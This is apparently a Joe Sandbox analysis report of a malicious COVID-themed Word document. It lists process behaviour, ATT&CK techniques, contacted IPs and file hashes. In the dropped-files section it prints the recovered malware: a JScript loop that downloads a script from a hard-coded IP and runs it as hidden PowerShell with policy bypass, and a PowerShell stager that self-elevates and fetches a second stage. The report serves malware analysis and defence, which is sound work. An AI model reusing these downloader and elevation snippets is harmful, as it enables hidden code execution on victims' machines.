Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: COVID-19.docStream path 'Macros/VBA/ThisDocument' : found possibly 'ActiveDocument.Name' functions activedocument.name
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, found possibly 'ActiveDocument.Name' functions activedocument.name
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe TID: 2752Thread sleep time: -300000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 532Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000004.00000002.2095015204.000000000028E000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\wscript.exeNetwork Connect: 78.141.194.181 80
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter1Path InterceptionProcess Injection111Masquerading11OS Credential DumpingSecurity Software Discovery111Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting53Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution12Logon Script (Windows)Logon Script (Windows)Process Injection111Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Scripting53NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
COVID-19.doc100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://78.141.194.181/s34987435987.txt0%Avira URL Cloudsafe
http://78.141.194.181/d56987230%Avira URL Cloudsafe
http://78.141.194.181/d569872345345.txt$$0%Avira URL Cloudsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe
http://78.141.194.181/d569872345345.txt0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://78.141.194.181/d569872345345.txttrue
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.piriform.com/ccleanerpowershell.exe, 00000004.00000002.2095054638.00000000002D9000.00000004.00000020.sdmpfalse
    high
    http://www.%s.comPAwscript.exe, 00000002.00000002.2094477193.00000000058B0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2095768489.00000000022D0000.00000002.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    low
    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.wscript.exe, 00000002.00000002.2094477193.00000000058B0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2095768489.00000000022D0000.00000002.00000001.sdmpfalse
      high
      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000004.00000002.2095015204.000000000028E000.00000004.00000020.sdmpfalse
        high
        http://78.141.194.181/s34987435987.txtwscript.exe, 00000002.00000002.2094003578.0000000003FEB000.00000004.00000001.sdmp, d569872345345[1].txt.2.drfalse
        • Avira URL Cloud: safe
        unknown
        http://78.141.194.181/d5698723COVID-19.docfalse
        • Avira URL Cloud: safe
        unknown
        http://78.141.194.181/d569872345345.txt$$COVID-19.docfalse
        • Avira URL Cloud: safe
        unknown
        http://servername/isapibackend.dllwscript.exe, 00000002.00000002.2091568558.0000000001C80000.00000002.00000001.sdmpfalse
        • Avira URL Cloud: safe
        low

        Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public

        IPDomainCountryFlagASNASN NameMalicious
        78.141.194.181
        unknownFrance
        20473AS-CHOOPAUStrue

        General Information

        Joe Sandbox Version:31.0.0 Red Diamond
        Analysis ID:341993
        Start date:20.01.2021
        Start time:10:24:15
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 4m 55s
        Hypervisor based Inspection enabled:false
        Report type:light
        Sample file name:COVID-19.doc
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:6
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • GSI enabled (VBA)
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal80.troj.expl.evad.winDOC@5/10@0/1
        EGA Information:Failed
        HDC Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .doc
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        Warnings:
        Show All
        • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtSetInformationFile calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        10:24:38API Interceptor64x Sleep call for process: wscript.exe modified
        10:24:44API Interceptor6x Sleep call for process: powershell.exe modified

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASN

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        AS-CHOOPAUSinsz.exeGet hashmaliciousBrowse
        • 141.164.40.157
        9oUx9PzdSA.exeGet hashmaliciousBrowse
        • 207.246.80.14
        3KvCNpcQ6tvwKr5.exeGet hashmaliciousBrowse
        • 45.76.199.220
        Details for bookings.exeGet hashmaliciousBrowse
        • 107.191.37.252
        CQcT4Ph03Z.exeGet hashmaliciousBrowse
        • 137.220.48.181
        Details here.exeGet hashmaliciousBrowse
        • 107.191.37.252
        Carta de pago.exeGet hashmaliciousBrowse
        • 207.148.72.173
        SCAN_20210115140930669.exeGet hashmaliciousBrowse
        • 139.180.142.220
        EED7.exeGet hashmaliciousBrowse
        • 207.246.80.14
        G4Q6P4rcer.exeGet hashmaliciousBrowse
        • 137.220.48.181
        XdzlrPkDsI.exeGet hashmaliciousBrowse
        • 136.244.98.158
        fil1Get hashmaliciousBrowse
        • 66.42.126.73
        Mv Tiger Flame.xlsxGet hashmaliciousBrowse
        • 137.220.48.181
        J0OmHIagw8.exeGet hashmaliciousBrowse
        • 45.77.226.209
        DTwcHU5qyI.exeGet hashmaliciousBrowse
        • 137.220.48.181
        4wCFJMHdEJ.exeGet hashmaliciousBrowse
        • 45.32.95.179
        BSL 21 PYT.xlsxGet hashmaliciousBrowse
        • 137.220.48.181
        20210111140930669.exeGet hashmaliciousBrowse
        • 139.180.142.220
        H56P7iDwnJ.docGet hashmaliciousBrowse
        • 207.148.24.55
        Confirm!!!..exeGet hashmaliciousBrowse
        • 107.191.37.252

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\d569872345345[1].txt
        Process:C:\Windows\System32\wscript.exe
        File Type:ASCII text
        Category:downloaded
        Size (bytes):1447
        Entropy (8bit):5.2641765089103165
        Encrypted:false
        SSDEEP:24:B2hmZrhzxyzTsSN9WSEDhgFsf81iem3fPb2QGKJmEP8Lz6XGy6V:l/xAsfSEDhgFc2iemPPbJaEPQzhnV
        MD5:9C0E8594784CC219239DF1906495C0F9
        SHA1:CD83A127C63B595C1D0772AFCBBC361B18BDC65D
        SHA-256:5374E582A5A0D2F1A28E9E93CE7D619C018DA3AAD1D3E232E30163232AF74B7E
        SHA-512:D750385EEE0600314D00CF785F2C2734CFD857C9E3E66D681936301CBAF2F29A017165B0824A7C03BF28587874DB25FE99943D2DB568960DF29D80F98E13105A
        Malicious:false
        Yara Hits:
        • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\d569872345345[1].txt, Author: Florian Roth
        Reputation:low
        IE Cache URL:http://78.141.194.181/d569872345345.txt
        Preview: param([Int32]$adminRights = 0).if( $adminRights -eq 0 ).{..$args = '-ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File "' + $MyInvocation.InvocationName + '" -adminRights 1'..$runned = $false..while( -not $runned )..{...Try...{....Start-Process -FilePath "powershell.exe" -ArgumentList $args -WindowStyle Hidden -Verb RunAs....$runned = $true...}...Catch...{...}..}.} .else {. $OSArchitecture = (Get-WmiObject -Class Win32_OperatingSystem | Select-Object OSArchitecture -ErrorAction Stop).OSArchitecture. if ($OSArchitecture -Eq '64-bit') {. $ppshome = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0'. } else {. $ppshome = 'C:\Windows\System32\WindowsPowerShell\v1.0'. }.. $url = "http://78.141.194.181/s34987435987.txt".. $dstFile = [System.IO.Path]::GetRandomFileName() + '.ps1'. $file = $ppshome + '\' + $dstFile.. Import-Module BitsTransfer. Start-BitsTransfer -Source $url -Destination $file.. $service = 'sc
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{17819F7E-DC64-4FB9-A805-BC7A4FB17A92}.tmp
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1024
        Entropy (8bit):0.05390218305374581
        Encrypted:false
        SSDEEP:3:ol3lYdn:4Wn
        MD5:5D4D94EE7E06BBB0AF9584119797B23A
        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
        Malicious:false
        Reputation:high, very likely benign file
        Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162688
        Entropy (8bit):4.254422390054345
        Encrypted:false
        SSDEEP:1536:C62L3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:C7JNSc83tKBAvQVCgOtmXmLpLm4l
        MD5:D6A7A3DFE6F21441C73252D5F7D001A9
        SHA1:20D87F922D282196AB74CF77B1766C3E735D3549
        SHA-256:0FB3B24159B90EFF5D25792B088EB617AD4AF3261A8945158A330F09F9AB0225
        SHA-512:0413C900634E96C902563CC8E592AB3ADDC3C7670BC9D0F0E133C90C94D95E169AE5EF0F3056299908E6F73585A3E72760AF90F5A55C949ADD3266E172E84038
        Malicious:false
        Reputation:low
        Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\COVID-19.LNK
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Wed Jan 20 17:24:34 2021, length=411136, window=hide
        Category:dropped
        Size (bytes):2008
        Entropy (8bit):4.516782006308219
        Encrypted:false
        SSDEEP:24:86zj/XTwz6I4U85Ne48Dv3qa+dM7dD26zj/XTwz6I4U85Ne48Dv3qa+dM7dV:86H/XT3InMzPQh26H/XT3InMzPQ/
        MD5:8019E9A7670898A1653EDA363CA6A6E2
        SHA1:AC5D95F29E123A90BF03E0E1D11C1380F7F5731C
        SHA-256:148653FB507AB71A284DEB5F6067571B92CE35DD4CE7A1150FEB7D2844F8D63F
        SHA-512:5C09C47D8093E31E8246E5246C7ED712A66F7ADBC22183183E6EA003844F31C92D50515A6620CC022093B07712194ABAF2339E8C33790BD75E8B6FDF9312E635
        Malicious:false
        Reputation:low
        Preview: L..................F.... ....+..{...+..{..s8..Y....F...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....b.2..F..4R.. .COVID-19.doc..F.......Q.y.Q.y*...8.....................C.O.V.I.D.-.1.9...d.o.c.......v...............-...8...[............?J......C:\Users\..#...................\\760639\Users.user\Desktop\COVID-19.doc.#.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.O.V.I.D.-.1.9...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......760639..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[
        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):62
        Entropy (8bit):4.344717181690711
        Encrypted:false
        SSDEEP:3:M1DxFu4o+oxFu4omX1DxFu4ov:M/jqjVjy
        MD5:F63AF074E210140025C91FB35C1FBC43
        SHA1:63341061EB572C4D72AA6486843692E86ABE62FD
        SHA-256:E41B2FC6D51793A5613E73950232522FE1D8A7328E4D2A2E56333A1774668BD1
        SHA-512:E2DC1D9A75D99CA803A29AD2460C9E8C9081F8B750DC31F885A7ECE6E8E38FA940022437799A6B38487A015901BC28E3897DC05106CAAB4B0902B0ECBC9DFAC3
        Malicious:false
        Reputation:low
        Preview: [doc]..COVID-19.LNK=0..COVID-19.LNK=0..[doc]..COVID-19.LNK=0..
        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.431160061181642
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
        MD5:39EB3053A717C25AF84D576F6B2EBDD2
        SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
        SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
        SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
        Malicious:false
        Reputation:high, very likely benign file
        Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8MNAJJYXMRKDR88Z2SFH.temp
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):8016
        Entropy (8bit):3.589695786675122
        Encrypted:false
        SSDEEP:96:MhQCsMqKqvsqvJCwo5zshQCsMqKqvsEHyqvJCworvzZXYnHyf8cqlUVrIu:MyPo5zsyzHnorvzZHf8clIu
        MD5:479C8741E36BCB4B20C486485BC7020D
        SHA1:3A9F50F0666B8686AAC214671683B3B5DE95763D
        SHA-256:BBBE739FD2D055F84999CA5ABB259E932C478218493E50017DB91C747C5D6511
        SHA-512:20BE74C4296574904AB1089066F61B5CCF83BA9ED303B573FB53F1BC024A318BBC11EAA040CACB03553CDA7014C91BC83E4302A2AB9B34A762D70BD15B0E4040
        Malicious:false
        Reputation:low
        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....4R... PROGRA~3..D.......:..4R..*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
        C:\Users\user\Desktop\COVID-19.ps1
        Process:C:\Windows\System32\wscript.exe
        File Type:Little-endian UTF-16 Unicode text, with CR, LF line terminators
        Category:dropped
        Size (bytes):2900
        Entropy (8bit):3.640765124039009
        Encrypted:false
        SSDEEP:48:hkM8lfpHyND/7rFucerCrdTAZVx2qJjuYllzT+FuidV9RiHBt92dA/HOu:OMypHuzxeuCZbrNuYllzT4uiX9RtS/H3
        MD5:C8CFEDB371AFA966C9ED6B715D694BA3
        SHA1:1ECFA6E23A05F3E90EFE009F6E4316F0EC487E73
        SHA-256:4CE39D2AA80D4110D4042DA7A38A58D6BFA7E3F5D604E4DF8394604B4864BBE6
        SHA-512:525145CE57E493071970FA5F8C4FEA845BE292EA214D2EC335987DB12AE969F8556D3709191FA8B1AD495337072654ABDB40A656EA0363790541E799053EE443
        Malicious:true
        Reputation:low
        Preview: ..p.a.r.a.m.(.[.I.n.t.3.2.].$.a.d.m.i.n.R.i.g.h.t.s. .=. .0.)...i.f.(. .$.a.d.m.i.n.R.i.g.h.t.s. .-.e.q. .0. .)...{.....$.a.r.g.s. .=. .'.-.E.x.e.c.u.t.i.o.n.P.o.l.i.c.y. .B.y.p.a.s.s. .-.N.o.L.o.g.o. .-.N.o.n.I.n.t.e.r.a.c.t.i.v.e. .-.N.o.P.r.o.f.i.l.e. .-.W.i.n.d.o.w.S.t.y.l.e. .H.i.d.d.e.n. .-.F.i.l.e. .".'. .+. .$.M.y.I.n.v.o.c.a.t.i.o.n...I.n.v.o.c.a.t.i.o.n.N.a.m.e. .+. .'.". .-.a.d.m.i.n.R.i.g.h.t.s. .1.'.....$.r.u.n.n.e.d. .=. .$.f.a.l.s.e.....w.h.i.l.e.(. .-.n.o.t. .$.r.u.n.n.e.d. .).....{.......T.r.y.......{.........S.t.a.r.t.-.P.r.o.c.e.s.s. .-.F.i.l.e.P.a.t.h. .".p.o.w.e.r.s.h.e.l.l...e.x.e.". .-.A.r.g.u.m.e.n.t.L.i.s.t. .$.a.r.g.s. .-.W.i.n.d.o.w.S.t.y.l.e. .H.i.d.d.e.n. .-.V.e.r.b. .R.u.n.A.s.........$.r.u.n.n.e.d. .=. .$.t.r.u.e.......}.......C.a.t.c.h.......{.......}.....}...}. ...e.l.s.e. .{... . . . .$.O.S.A.r.c.h.i.t.e.c.t.u.r.e. .=. .(.G.e.t.-.W.m.i.O.b.j.e.c.t. .-.C.l.a.s.s. .W.i.n.3.2._.O.p.e.r.a.t.i.n.g.S.y.s.t.e.m. .|. .S.e.l.e.c.t.-.O.b.j.e.c.t. . . . .O.S.A.r.
        C:\Users\user\Desktop\COVID-19.tmp
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):554
        Entropy (8bit):5.220142529887273
        Encrypted:false
        SSDEEP:12:eUvDzr8iOf8dN1T02PWXO6qL1HdR5ehLUM17TA1QT8AdLOG9qrCNZ:eUz8iT9TXPFV5etxECNZ
        MD5:3FD70F372A6F26FC34E6111A28C0D2EC
        SHA1:FE2CB797F4D089736B31E370F4F4C8BCAFD36D15
        SHA-256:45E7347E2C636CBE669028FC976B5DC266745203A614B0EE8C3B3C2395AEC6FB
        SHA-512:85811D68CA6562D229341D2F7285C81DC76617D15E03363B0BF63460CCF549199B3F6F456AADC6F7AF01C597EF5775EEE835E74A9D17DEDA818D8E9F2FDE24D0
        Malicious:true
        Reputation:low
        Preview: var o = WScript.CreateObject("MSXML2.XMLHTTP");..var ps = 'C:\\Users\\user\\Desktop\\COVID-19.ps1'..while (true) {.. o.Open('GET','http://78.141.194.181/d569872345345.txt',0);.. o.Send();.. if (o.Status==200) {.. var so = new ActiveXObject('Scripting.FileSystemObject');.. var fo = so.CreateTextFile(ps, true, true);.. fo.WriteLine(o.responseText);.. fo.Close();.. var c = 'powershell -ex bypass -win hid -f ' + ps;.. (new ActiveXObject("WScript.Shell")).Run(c, 0);.. WScript.Quit();.. }..}..
        C:\Users\user\Desktop\~$VID-19.doc
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.431160061181642
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
        MD5:39EB3053A717C25AF84D576F6B2EBDD2
        SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
        SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
        SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
        Malicious:false
        Reputation:high, very likely benign file
        Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

        Static File Info

        General

        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: -535, Author: , Template: Normal.dotm, Last Saved By: Windows User, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Total Editing Time: 05:57:00, Create Time/Date: Mon Jan 18 22:07:00 2021, Last Saved Time/Date: Tue Jan 19 18:30:00 2021, Number of Pages: 1, Number of Words: 0, Number of Characters: 2, Security: 0
        Entropy (8bit):7.474426291744808
        TrID:
        • Microsoft Word document (32009/1) 79.99%
        • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
        File name:COVID-19.doc
        File size:409088
        MD5:9f9f50f3c32ee660a8bbe6616dda8b34
